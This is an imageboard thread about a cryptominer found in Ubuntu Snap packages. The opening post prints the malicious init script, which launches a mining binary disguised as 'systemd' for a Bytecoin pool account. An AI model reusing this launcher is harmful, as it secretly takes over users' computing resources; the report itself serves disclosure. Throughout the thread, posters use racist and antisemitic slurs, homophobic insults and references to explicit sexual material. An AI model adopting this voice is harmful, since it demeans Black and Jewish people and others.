Malware found in Snaps distributed by Ubuntu

Some Snaps (probably all) of Nicolas Tomb contains miner! This is the content of init script of 2048buntu package:

#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u [email protected] --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
/snap/$name/current/systemd -u [email protected] --$currency 1
else
/snap/$name/current/systemd -u [email protected] --$currency 2
fi
}

Issue on github:

github.com/canonical-websites/snapcraft.io/issues/651

All snaps of Nicolas Tomb:

uappexplorer.com/snaps?q=author:Nicolas Tomb&sort=-points

Edit.

All Snaps of that author were removed from the store.

Attached: ubuntusnappy-580x358.png (580x358, 173.38K)

Other urls found in this thread:

icculus.org/fatelf/
reddit.com/r/linux/comments/8iupdz/caution_the_are_malware_snaps_in_ubuntu_snaps/
whylinuxisbetter.net/en/
twitter.com/NSFWRedditImage

The icing on this shit cake is that the binary was named "systemd" to fool users.

Attached: 8dfc2b9b9891ad3b61cfbe294e835313e6c24db3512b839cd7875ba776300df5.png (1219x1480, 847.75K)

I've always been suspicious of Snaps and Flatpaks. Sounds like something right out of some shitty hipster startup from siliconeSJW valley. If your program requires some third party package distribution system then you might want to rethink your build system and dependency management. From wiki: The idea of using application containers in GNOME was first proposed in 2013 by Lennart Poettering. I knew it! Another great idea from our lord and savior Lennart.

The absolute state of systemd shills.

Attached: 19fce4c0944145ad5be75aa45da1a82a5983157cc1d066b62280399596d33ec0.jpg (1077x717, 136.42K)

they wanted to shutdown discussion on this one asap.
seems a little early, considering malware was just found in their repos.

Attached: shutitdown.png (810x502, 61.85K)

Flatpak and AppImage are no worse than .deb/RPM and tarballs from a security standpoint. As always, you bypass your package manager at your own risk.

Attached: 3b61e801a7fcbd0b812e5c76798f8256a04f531902581c65d105d2a36cdd056e.png (1749x1656, 343.29K)

The idea for distro-agnostic packages have been around longer than that. Ever heard of fatELF?

icculus.org/fatelf/

Attached: 8318b8c4633f3d58e1fae507abcd3f03.png (3840x2160, 3.34M)

I vaguely remember Icculus pushing this back in the day. I forget exactly why it got rejected. FatElf was basically the Windows way of doing things shoehorned into Unix/Linux. Then again, this IS the guy to invented Mojo installers.

Attached: c2a79c732c93a1783ddaddf2016a3f76.jpg (600x1083, 117.42K)

Kinda late though. This has already blown up on the Linux Leddit.

how about statically compiling all the libraries into the binary?
is this not distro-agnostic? will this not run on the majority of distro's with no dependency requirements?

i realize it's a pain in the ass to compile and results an an extremely bloated executable but who cares if some fuck is too lazy to install dependencies then he gets this.

glibc's static linking fucking sucks

There is a good reason FatElf was rejected by Linus, whereas AppImage and Flatpak get his support.

OH NO NO NO

i hope they run him down

Attached: 1473884635179.png (657x527, 20.74K)

link?
could not find anything about it, was it already deleted?

reddit.com/r/linux/comments/8iupdz/caution_the_are_malware_snaps_in_ubuntu_snaps/

Flatpak and AppImage have made life sticking to LTS releases MUCH easier. But yeah, we are going to have to hold Canonical and the Flathub guys to account when shit like this happens.

Attached: da7abca15b4d97096ea763159c848928.gif (400x596, 63.5K)

well i mean, it was indistinguishable from malware in the first place but okay

i'm not talking about fatelf. i'm not talking about multiple architectures, arm, x86, etc, in the same binary, just regular static compiled x86 binaries.

what are the problems? i've only done it a couple of times and given I didn't test the result on 10 different distributions but i've never had problems.

great, here's the solution. we need the equivalent of pozjew and chromium's forced add-on signing even for shit that isn't in the appstore, now on your desktop.

we need a bunch of kikes to sit and moderate software that is specifically not in the moderated package repositories. surely this will go well. this nigger did this on purpose to bring down censorship on flatpack and snaps or whatever the fuck else.

Attached: oyvey.png (740x614, 106.59K)

every time i go to reddit my blood pressure goes up 20 points.

Attached: lastresort.png (652x319, 46.92K)

That isn't really technically possible though. I mean, you could make users jump through an extra hoop I suppose.

I mean, depending on how old your distro is, compiling a new version of foo might not be an option. That said, I imagine this is how most casual Linux users see things.

i would say i'm too used to gentoo, but it's not difficult on debian/jewbuntu either.
apt-get build-dep poosoftapt-get source poosofttar -xzf poosoftcd poosoft./configuremake -j1checkinstall poosoft

Not everything is that trivial to compile though.

Flathub hasn't had anything like this happen though. From here on, I'd say AppImage is a more likely Trojan horse for this kind of mining malware.

Attached: f30c9dd979ce7ce8d0ff1c03db71e1c958d62d6c0dbf140f36f2c0906fe635cb.png (680x1352, 890.09K)

it wouldn't surprise me if canonical patched the kernel to include a kosher signing check before every executable runs.

That wouldn't have stopped this though. THEY are the ones who allowed it in their repo in the first place.

This is what you get for using proprietary software.

The binary blob was snuck into the package. 2048 itself is free software.

This was inevitable, Canonical and the "Year of the Linux Desktop" faggots want Windows but the street cred of Linux, so they will turn GNU/Linux into Windows with all the malware. Android/Linux has the same problem even though Google has full control there, you just can't make sure that a proprietary blob is not malicious. But the business models of the platform owners rests on the masses executing arbitrary code from third parties so they will just sacrifice some suckers and pull the malware when there is an outcry.

Not the snap version, thanks to submissive license.

Attached: reddit.PNG (626x358, 20.62K)

Snap is actually geared more to IOT than the Desktop. One of the main reasons they think it's better than Flatpak is because Flatpak actually is centered around desktop use cases.

I wonder if they can find out exactly who this is.

cuck licenses btfo again

Common sense should avoid most of this shit though. Don't download the Krita AppImage from anyplace besides the Krita official or anywhere else they endorse.

Attached: DYNAU1yUMAAbndW.jpg:large.jpg (800x800, 29.98K)

and of course upgrading to a new version of shitlib breaks five dozen other applications. Granted, you could compile the new shitlib and statically link against that, but you'll have to compile seven more dependencies for it, one of them requiring very exotic compiler flags to not crash every other minute.

You can have multiple versions of the same library installed at the same time.

What is wrong with compiling yourself only as the last resort? Not every software is as trivial as
./configure && make && make install

The problem here is that no one audtis the packages submitted to the Snap store, not Snap itself.

You can be sure that this has happened with PPA and AUR but nobody ever realized.

>obvious leddit copy-paste thread without archive links
>ByteCoin (BCN) has a nigger and a sandnigger in its developer team, and the overall community manager is likely a kike
>BCN is accused of being a (((scamcoin))) multiple times

...

Never was this logical. Any package can contain a virus. Or even a python script you've downloaded from somewhere.

Nevermind how much longer it can take for larger applications like the GIMP or Kdenlive.

*Malware. Viruses replicate themselves into other systems. And ANY operating system can have malware made for it.

Who told you that? It just has less relevant vulnerabilities and is less affected by malware.

whylinuxisbetter.net/en/

lol

Just when I was about to try out Kubuntu.
Did it come preinstalled?

Snap comes preinstalled. These packages didn't.
This is only slightly more remarkable than "malware found on Google Play".

gg freetards. If you pay for software, you don't get malware. Remember, if you're not the customer, you're the product.

also remember to not use paid software which is proprietary. They can double dip with you being both the customer AND the product (without you even knowing it).

And here's why you're retarded
Learn to read dumbfuck

Keep posting these sexy women

Most proprietary software is malware. Doesn't matter if you pay for it or not.

this is why you install gentoo

You don't want that. Trust me.

Attached: 3a6857cf38ac2c0f0a79e5201e9527d743cf07e4_hq.jpg (864x636, 118.9K)

digusting.
spoiler that shit.

Do what I asked you to do pls
Also please include source

You don't have to link against glibc. Link against musl or any non-bloated libc and it will still run in a glibc environment. The only thing a statically linked binary depends on is kernel interfaces being present, and we all know how autistic linus is about backwards compatibility (it why linux is such a bloated piece of shit).


Ulrich drepper actively tries to make statically linking with glibc terrible. I can't find the articles right now though. In general however the meme about static linking producing huge binaries comes entirely from people linking against glibc. The smallest possible program( int main() {} ) statically linked with glibc is >600K.

Stop. You are hurting me.

I said please

It's ShindoL, some of the tags from that doujin are: mind break, torture, moral degradation, moral degeneration, snuff, guru, blackmail, drugs, and incest. If that still interests you then have fun user.

You can always tell a newfag from the way they sperg about Libbie and Kiki. Most useful.

Attached: 412f38f32cbae7e825d0dbe1237a1daa48a36fa79965b62c3e823a000a8bf19d.png (2023x1011, 238.56K)

H-How did you know those tags turn me on? A-Are you the botnet?

I only sperg about nigger Libbie.

Didn't do well in maff class, white boy?

Attached: 81cafcba2f208fa930301ce31299f7480692ca40c9de9d21197e1a9567035110.png (2024x3522, 4.01M)

How is it possible to do well with a teacher like THAT? My grades would be solely determined by 'extracurricular activities'

To you this is an improvement of an actual nigger.
To me this is bestiality squared.

Whatever you say, new friend.

Learn about the [code] tags, retard

...

Nice pic related

You could have avoided this if you'd used the Guix package manager.

Hipster trash worse than a toy package manager.

am I the only one who anticipates the massive hit of botnet coin miners?
sure sucks to be notech and normal at the botnet age

I dunno, Maff seems alright to me.

Solution: Don't use Snappy, a package manager designed for proprietary, walled graden bullshit.

Flatpak is currently more popular with most OSS application devs atm anyway.